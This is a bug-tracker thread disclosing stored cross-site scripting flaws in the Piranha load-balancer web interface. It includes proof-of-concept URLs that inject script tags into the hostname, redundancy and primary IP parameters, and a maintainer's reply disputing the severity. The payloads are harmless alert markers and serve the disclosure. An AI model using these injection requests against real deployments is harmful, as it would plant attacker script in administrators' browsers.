Description of the issue: It seems that Piranha web application does not escape its output and/or user input (hostnames/IPs/etc...) which leads to Cross Site Scripting vulnerabilities, some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf' Tested version: piranha-0.8.6-4.el6.x86_64 Examples of the vulnerabilities: 1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php): NB. port, address and other parameters are also vulnerable PoC: ---- http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT Result: The injection in the PoC will appear in the following page: http://server:3636/secure/virtual_main.php Relevant part of '/etc/sysconfig/ha/lvs.cf': [...] virtual <script>alert(1)</script> { active = 0 address = 0.0.0.0 eth0:1 port = 80 send = "GET / HTTP/1.0\r\n\r\n" expect = "HTTP" use_regex = 0 load_monitor = none scheduler = wlc protocol = tcp timeout = 6 reentry = 15 quiesce_server = 0 } 2) stored XSS in redundant parameter (redundancy.php) NB. other parameters could also be vulnerable. PoC: ---- http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT Relevant part of '/etc/sysconfig/ha/lvs.cf': [...] backup = 0.0.0.0><script>alert(1)</script> [...] 3) stored XSS in PriLVSIP (global_settings.php) NB. other parameters could also be vulnerable. PoC: ---- http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT Relevant part of '/etc/sysconfig/ha/lvs.cf': [...] primary = 192.168.1.100"><script>alert(1)</script> [...]
Created attachment 848233 [details] A screenshot of one of the issues
(In reply to Athmane Madjoudj from comment #0) > which leads to Cross Site Scripting vulnerabilities, some of them are > reflected (low impact) Your report do not seem to specify any reflected XSS, only 3 stored XSS are listed. > and some are persistent/stored (high impact) in the configuration file > '/etc/sysconfig/ha/lvs.cf' That's correct, input from lvs.cf are not encoded properly before being added to the output of the web application. However, I disagree with the high impact rating. For the application, lvs.cf is really a trusted input for the application. Also privileges to edit the file via the web application are administrative privileges, which make this more of a bug than a real security issue.
(In reply to Tomas Hoger from comment #2) > (In reply to Athmane Madjoudj from comment #0) > > which leads to Cross Site Scripting vulnerabilities, some of them are > > reflected (low impact) > > Your report do not seem to specify any reflected XSS, only 3 stored XSS are > listed. > I didn't have time to check everything, so I could be wrong about reflected XSS. > > and some are persistent/stored (high impact) in the configuration file > > '/etc/sysconfig/ha/lvs.cf' > > That's correct, input from lvs.cf are not encoded properly before being > added to the output of the web application. However, I disagree with the > high impact rating. For the application, lvs.cf is really a trusted input > for the application. Also privileges to edit the file via the web > application are administrative privileges, which make this more of a bug > than a real security issue. True